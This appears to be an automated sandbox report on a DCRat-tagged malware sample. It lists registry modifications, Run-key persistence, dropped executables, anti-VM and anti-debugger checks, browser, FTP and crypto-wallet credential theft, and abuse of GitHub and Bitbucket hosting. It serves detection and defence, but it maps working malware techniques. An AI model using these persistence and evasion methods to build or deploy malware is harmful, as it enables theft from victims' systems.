dcrat | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Modify Registry

T1112

Processes:

$77_loader.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe\PerfOptions	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe\PerfOptions	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe	$77_loader.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

dvchost.exelatestroc.exewinhostDhcp.exensp2AF5.tmpED3A.exeworkforroc.exe4363463463464363463463463.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	dvchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	latestroc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	winhostDhcp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	nsp2AF5.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	ED3A.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	workforroc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe

Executes dropped EXE 55 IoCs

Processes:

cayV0Deo9jSt417.exetaskhost.exeBestSoftware.exedvchost.execp.exelatestroc.exepixelcloudnew2.exeInstallSetup8.exetoolspub1.exe31839b57a4f11171d6abc8bbc4451ee4.exeasas.exeBroomSetup.exerty25.exesvchost.exensp2AF5.tmpVCDDaemon.exe7z.exe7z.exe7z.exe7z.exewinhostDhcp.exewinhostDhcp.exe31839b57a4f11171d6abc8bbc4451ee4.exeDABB.exeED3A.exeED3A.exeED3A.exeED3A.exeRegAsm.exeD38.exeWerFault.execsrss.exeinjector.exewindefender.exewindefender.exeConhost.exe9B71.exeB4.exestub.execrypted_d786fd3e.exesouth.exeInstallSetup8.exeTemp2.exeredline1234.exeama.exeasg.exebuild2.exebuild2.exeuwgxswmtctao.exeworkforroc.exe%40Natsu338_alice.exeInstallSetup9.exetoolspub1.exe$77_loader.exe1230.exe

pid	Process
2140	cayV0Deo9jSt417.exe
3760	taskhost.exe
4492	BestSoftware.exe
4484	dvchost.exe
2348	cp.exe
440	latestroc.exe
4444	pixelcloudnew2.exe
2576	InstallSetup8.exe
5024	toolspub1.exe
1360	31839b57a4f11171d6abc8bbc4451ee4.exe
780	asas.exe
5076	BroomSetup.exe
5064	rty25.exe
3980	svchost.exe
852	nsp2AF5.tmp
4464	VCDDaemon.exe
5104	7z.exe
4416	7z.exe
2088	7z.exe
4696	7z.exe
2984	winhostDhcp.exe
3444	winhostDhcp.exe
1336	31839b57a4f11171d6abc8bbc4451ee4.exe
3700	DABB.exe
2676	ED3A.exe
4732	ED3A.exe
3364	ED3A.exe
3756	ED3A.exe
2060	RegAsm.exe
4344	D38.exe
2076	WerFault.exe
2080	csrss.exe
3216	injector.exe
1328	windefender.exe
3344	windefender.exe
4020	Conhost.exe
2092	9B71.exe
3064	B4.exe
4748	stub.exe
2332	crypted_d786fd3e.exe
1752	south.exe
3064	InstallSetup8.exe
1436	Temp2.exe
4852	redline1234.exe
1956	ama.exe
2072	asg.exe
2356	build2.exe
2396	build2.exe
1464	uwgxswmtctao.exe
1240	workforroc.exe
3816	%40Natsu338_alice.exe
1388	InstallSetup9.exe
852	toolspub1.exe
680	$77_loader.exe
4728	1230.exe

Loads dropped DLL 46 IoCs

Processes:

InstallSetup8.exeVCDDaemon.exe7z.exe7z.exe7z.exe7z.exensp2AF5.tmpcp.exeRegAsm.exestub.exe

pid	Process
2576	InstallSetup8.exe
2576	InstallSetup8.exe
4464	VCDDaemon.exe
4464	VCDDaemon.exe
4464	VCDDaemon.exe
5104	7z.exe
4416	7z.exe
2088	7z.exe
4696	7z.exe
852	nsp2AF5.tmp
852	nsp2AF5.tmp
2348	cp.exe
2576	InstallSetup8.exe
2060	RegAsm.exe
2060	RegAsm.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe
4748	stub.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exe

pid	Process
2560	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral3/files/0x000300000001e7f5-1412.dat	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

Processes:

clip.exepowershell.exeED3A.exe31839b57a4f11171d6abc8bbc4451ee4.execsrss.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\???-LDKG91 = "\"C:\\Users\\Admin\\AppData\\Roaming\\System32\\taskhost.exe\""	clip.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tests_for_preparation_for_technical_school = "C:\\Users\\Admin\\AppData\\Local\\Tests_for_preparation_for_technical_school\\Tests_for_preparation_for_technical_school.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\66636179-2e9a-4a3b-b05e-f46de5886a87\\ED3A.exe\" --AutoStart"	ED3A.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

Processes:

flow	ioc
282	raw.githubusercontent.com
397	bitbucket.org
400	bitbucket.org
14	raw.githubusercontent.com
15	raw.githubusercontent.com
165	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
290	ip-api.com
76	ip-api.com
133	api.2ip.ua
134	api.2ip.ua

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

Processes:

csrss.exe

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in System32 directory 13 IoCs

Processes:

powershell.exepowershell.exewinhostDhcp.exeWerFault.exepowershell.exeWerFault.exeasg.exepowershell.exeTemp2.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\System32\F12\de-DE\6203df4a6bafc7	winhostDhcp.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	WerFault.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	WerFault.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	WerFault.exe
File opened for modification	C:\Windows\SysWOW64\SubDir	asg.exe
File created	C:\Windows\System32\F12\de-DE\lsass.exe	winhostDhcp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\SubDir\asg.exe	Temp2.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\asg.exe	Temp2.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\asg.exe	asg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

9B71.exe

pid	Process
2092	9B71.exe
2092	9B71.exe
2092	9B71.exe
2092	9B71.exe
2092	9B71.exe
2092	9B71.exe
2092	9B71.exe

Suspicious use of SetThreadContext 14 IoCs

Processes:

cayV0Deo9jSt417.exeBestSoftware.exeVCDDaemon.execp.execmd.exeED3A.exeED3A.exeRegAsm.exeD38.exeWerFault.execrypted_d786fd3e.exebuild2.exeuwgxswmtctao.exe%40Natsu338_alice.exe

description	pid	Process	procid_target
PID 2140 set thread context of 2000	2140	cayV0Deo9jSt417.exe	89
PID 4492 set thread context of 4092	4492	BestSoftware.exe	114
PID 4464 set thread context of 2336	4464	VCDDaemon.exe	118
PID 2348 set thread context of 5020	2348	cp.exe	190
PID 2336 set thread context of 4640	2336	cmd.exe	211
PID 2676 set thread context of 4732	2676	ED3A.exe	232
PID 3364 set thread context of 3756	3364	ED3A.exe	239
PID 2060 set thread context of 3776	2060	RegAsm.exe	246
PID 4344 set thread context of 2060	4344	D38.exe	251
PID 2076 set thread context of 4780	2076	WerFault.exe	253
PID 2332 set thread context of 4392	2332	crypted_d786fd3e.exe	323
PID 2356 set thread context of 2396	2356	build2.exe	334
PID 1464 set thread context of 4032	1464	uwgxswmtctao.exe	346
PID 3816 set thread context of 3080	3816	%40Natsu338_alice.exe	352

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exe

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 2 IoCs

Processes:

winhostDhcp.exe

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Temp\EU677F.tmp\fontdrvhost.exe	winhostDhcp.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EU677F.tmp\5b884080fd4f94	winhostDhcp.exe

Drops file in Windows directory 4 IoCs

Processes:

31839b57a4f11171d6abc8bbc4451ee4.execsrss.exe

description	ioc	Process
File opened for modification	C:\Windows\rss	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\rss\csrss.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid	Process
4328	sc.exe
3208	sc.exe
4584	sc.exe
4336	sc.exe
2520	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 53 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
4996	1360	WerFault.exe	107
1200	1360	WerFault.exe	107
1436	1360	WerFault.exe	107
2528	1360	WerFault.exe	107
3300	1360	WerFault.exe	107
4420	1360	WerFault.exe	107
3220	1360	WerFault.exe	107
3640	1360	WerFault.exe	107
2292	1360	WerFault.exe	107
2528	1360	WerFault.exe	107
2584	1360	WerFault.exe	107
3216	1360	WerFault.exe	107
3324	1360	WerFault.exe	107
4552	1360	WerFault.exe	107
1900	1360	WerFault.exe	107
2700	1360	WerFault.exe	107
2296	1360	WerFault.exe	107
1992	1360	WerFault.exe	107
1648	1360	WerFault.exe	107
680	852	WerFault.exe	115
3700	1336	WerFault.exe	206
3608	1336	WerFault.exe	206
3156	1336	WerFault.exe	206
1844	1336	WerFault.exe	206
4412	1336	WerFault.exe	206
3336	1336	WerFault.exe	206
1588	1336	WerFault.exe	206
1800	1336	WerFault.exe	206
772	1336	WerFault.exe	206
2292	3700	WerFault.exe	228
2988	3756	WerFault.exe	239
1780	2080	WerFault.exe	254
2076	2080	WerFault.exe	254
1708	2080	WerFault.exe	254
4924	2080	WerFault.exe	254
4036	2080	WerFault.exe	254
464	2080	WerFault.exe	254
3156	2080	WerFault.exe	254
2584	2080	WerFault.exe	254
2928	2080	WerFault.exe	254
4536	2080	WerFault.exe	254
2212	2080	WerFault.exe	254
1844	2080	WerFault.exe	254
1092	2080	WerFault.exe	254
3364	2080	WerFault.exe	254
4216	2080	WerFault.exe	254
1240	4020	WerFault.exe	306
4004	1240	WerFault.exe	347
3052	2396	WerFault.exe	334
2076	2080	WerFault.exe	254
4580	2080	WerFault.exe	254
4356	2080	WerFault.exe	254
116	2080	WerFault.exe	254

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

toolspub1.exetoolspub1.exe

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

nsp2AF5.tmpRegAsm.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	nsp2AF5.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	nsp2AF5.tmp
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 23 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

pid	Process
4636	schtasks.exe
988	schtasks.exe
3432	schtasks.exe
2428	schtasks.exe
2000	schtasks.exe
1180	schtasks.exe
4796	schtasks.exe
4552	schtasks.exe
5032	schtasks.exe
1576	schtasks.exe
3028	schtasks.exe
3836	schtasks.exe
3340	schtasks.exe
2252	schtasks.exe
5012	schtasks.exe
452	schtasks.exe
2528	schtasks.exe
776	schtasks.exe
1912	schtasks.exe
1844	schtasks.exe
1940	schtasks.exe
776	schtasks.exe
1384	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
4636	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

Processes:

tasklist.exe

pid	Process
184	tasklist.exe

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

Processes:

NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXE

pid	Process
3540	NETSTAT.EXE
3052	NETSTAT.EXE
1932	NETSTAT.EXE
2528	NETSTAT.EXE
3540	NETSTAT.EXE
1176	NETSTAT.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWerFault.exe31839b57a4f11171d6abc8bbc4451ee4.exeWerFault.exepowershell.exewindefender.exepowershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WerFault.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	WerFault.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2322 = "Sakhalin Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2392 = "Aleutian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WerFault.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WerFault.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WerFault.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-352 = "FLE Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2591 = "Tocantins Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	WerFault.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time"	windefender.exe
